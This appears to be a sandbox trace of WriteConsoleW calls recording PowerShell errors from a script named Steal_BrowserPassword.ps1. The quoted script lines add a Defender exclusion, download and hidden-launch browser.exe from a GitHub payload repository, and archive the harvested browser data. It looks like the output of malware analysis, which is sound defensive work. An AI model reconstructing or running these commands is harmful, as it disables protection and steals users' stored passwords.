WriteConsoleW
|
buffer:
The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, script file, or operable program. Check the spelling of the name, or if a pat
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h was included, verify that the path is correct and try again.
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:25 char:17
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ Add-MpPreference <<<< -ExclusionPath $env:tmp
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
mmandNotFoundException
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'iwr' is not recognized as the name of a cmdlet, function, script file
console_handle:
0x00000097
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, or operable program. Check the spelling of the name, or if a path was include
console_handle:
0x000000a3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
d, verify that the path is correct and try again.
console_handle:
0x000000af
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:28 char:4
console_handle:
0x000000bb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ iwr <<<< "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser
console_handle:
0x000000c7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
.exe?raw=true" -outfile "$env:tmp\browser.exe"
console_handle:
0x000000d3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (iwr:String) [], CommandNotFound
console_handle:
0x000000df
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception
console_handle:
0x000000eb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x000000f7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Start-Process : Cannot bind parameter 'WindowStyle'. Cannot convert value "h" t
console_handle:
0x00000117
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
o type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration value
console_handle:
0x00000123
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
s. Specify one of the following enumeration values and try again. The possible
console_handle:
0x0000012f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
enumeration values are "Normal, Hidden, Minimized, Maximized".
console_handle:
0x0000013b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:31 char:72
console_handle:
0x00000147
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle <<<<
console_handle:
0x00000153
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h -Wait
console_handle:
0x0000015f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidArgument: (:) [Start-Process], ParameterB
console_handle:
0x0000016b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
indingException
console_handle:
0x00000177
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerSh
console_handle:
0x00000183
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ell.Commands.StartProcessCommand
console_handle:
0x0000018f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'Compress-Archive' is not recognized as the name of a cmdlet, function
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, script file, or operable program. Check the spelling of the name, or if a pat
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
h was included, verify that the path is correct and try again.
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:34 char:17
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ Compress-Archive <<<< -Path "$env:tmp\results" -DestinationPath $env:tmp\bro
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
wserdata.zip
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (Compress-Archive:String) [], Co
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
mmandNotFoundException
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x00000083
|
1
|
1 |
0
|